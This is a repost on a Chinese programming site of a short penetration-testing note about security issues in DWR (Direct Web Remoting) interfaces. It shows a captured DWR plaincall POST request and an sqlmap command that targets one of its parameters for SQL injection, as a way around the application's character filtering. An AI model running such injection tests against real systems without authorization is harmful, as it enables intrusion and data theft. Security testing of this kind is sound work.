技术频道

公众号推荐

微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦！

DWR安全问题

时间：2020-06-03分类：Ajax作者：编程之家

作者 -- Ends

昨天测试某系统没有发现比较严重的问题，从数据包中发现了dwr接口，尝试下XSS返回为text/plain。查看官方对DWR Security的说明（http://directwebremoting.org/dwr/security/index.html）也是说XSS、CSRF的。如果接口中包含上传功能，应该和webservice类似吧，还没有利用成功过。

使用接口时还存在一个问题，程序对特殊字符进行过滤，但是接口存在注入等问题，这样通过接口就可绕过程序的安全限制。

POST http://ends.cc/dwr/call/plaincall/providerregisterLbTProviderForm.forCheck.dwr HTTP/1.1
Accept: */*
Content-Type: text/plain
Referer: http://ends.cc/xxxxxxx
Accept-Language: zh-cn
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ends.cc
Content-Length: 354
Connection: Keep-Alive
Pragma: no-cache

callCount=1&page=/xxxxxxxxxx&httpSessionId=sssssssssssssssssssssssssssssssssss!164282365!432731937&scriptSessionId=sssssssssssssssssssssssssssssss&c0-scriptName=providerregisterLbTProviderForm&c0-methodName=forCheck&c0-id=0&c0-e1=string:testest&c0-e2=string:&c0-param0=Object_Object:{userName:reference:c0-e1,password:reference:c0-e2}&batchId=2

python sqlmap.py -r sqlmap.xml -p c0-e1

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容，请发送邮件至 dio@foxmail.com 举报，一经查实，本站将立刻删除。

上一篇：Ajax&Json<1>认识ajax 下一篇：旧知识打造新技术--AJAX学习总结

相关推荐

ajax 上传文件项目下载

IE6是一个非常老旧的网页浏览器，虽然现在很少人再使用它，但是在某些特殊情况下，我们可能还需要使用IE6来访问网页。而在IE6中，我们通常会使用JavaScript来提交表单，来看一下具体操作。

作者：编程之家时间：2023-08-20

PHP中的count()函数是用来计算数组或容器中元素的个数。这个函数十分方便，在编写代码时使用频率也非常高。无论你是要统计数组的长度、统计字符串中字符出现的次数还是统计对象中属性的个数，count()都可以帮助你轻松

作者：编程之家时间：2023-08-20

ajax 不返回值写法

使用 AJAX（Asynchronous JavaScript and XML）技术可以在不刷新整个页面的情况下，向服务器发送请求并接收响应。通常来说，我们使用 AJAX 请求是为了获取后台数据，并将其展示在前端页面上。然而，有时候我们只需要

作者：编程之家时间：2023-08-20

ajax 下载文件 blob

Ajax（Asynchronous JavaScript and XML）是一种用于改进网页用户体验的技术，通过与服务器进行异步通信，实现在网页上局部刷新数据而不必整个页面刷新的功能。在实际开发中，我们经常需要从服务器端下载文件，而传统

作者：编程之家时间：2023-08-20

ajax 下载excel文件流

本文将介绍如何通过AJAX下载Excel文件流。通过AJAX，我们可以在不刷新整个页面的情况下，向服务器发送请求并获取响应数据。在某些场景下，我们需要通过AJAX下载Excel文件流，以便于在前端使用或保存到本地。本文将详

作者：编程之家时间：2023-08-20

ajax .get .post

Ajax是一种用于客户端和服务器之间的异步通信技术。通过Ajax，我们可以在不刷新整个页面的情况下向服务器发送请求并获得响应数据。而在Ajax的基础上，.get和.post是两种常用的请求方法，它们分别用于发送GET和POST请

作者：编程之家时间：2023-08-20

ajax 上传 excel

AJAX（Asynchronous JavaScript and XML）是一种在网页上实现异步数据传输的技术。通过AJAX，网页可以在不刷新整个页面的情况下与服务器进行数据交互，提升用户体验和页面性能。在实际应用中，AJAX广泛用于表单提交、

作者：编程之家时间：2023-08-20

ajax 下拉 360取不到值

在使用Ajax下拉加载数据的过程中，有时候会出现无法取到360度的问题。这个问题可能是由于代码逻辑的问题导致的，也有可能是网络延迟引起的。为了解决这个问题，我们需要对代码进行仔细排查，并且在合适的地方添加适当

作者：编程之家时间：2023-08-20

ajax 与 .post 区别

本文将介绍Ajax和.post之间的区别。Ajax是一种用于在网页上进行异步通信的技术，能够在不刷新整个页面的情况下更新部分页面内容。.post是jQuery中的一个方法，用于向服务器发送POST请求。虽然它们都可以用于发送异步

作者：编程之家时间：2023-08-20

ajax 上传文件目录权限

AJAX（Asynchronous JavaScript and XML）是一种在Web页面上进行异步数据请求和交互的技术。它的出现使得页面在后台与服务器进行数据交互的同时，不需要重新加载整个页面。在网页开发中，常常需要实现文件上传功能，

作者：编程之家时间：2023-08-20

小编推荐

苹果市值2025年有望达4万亿美元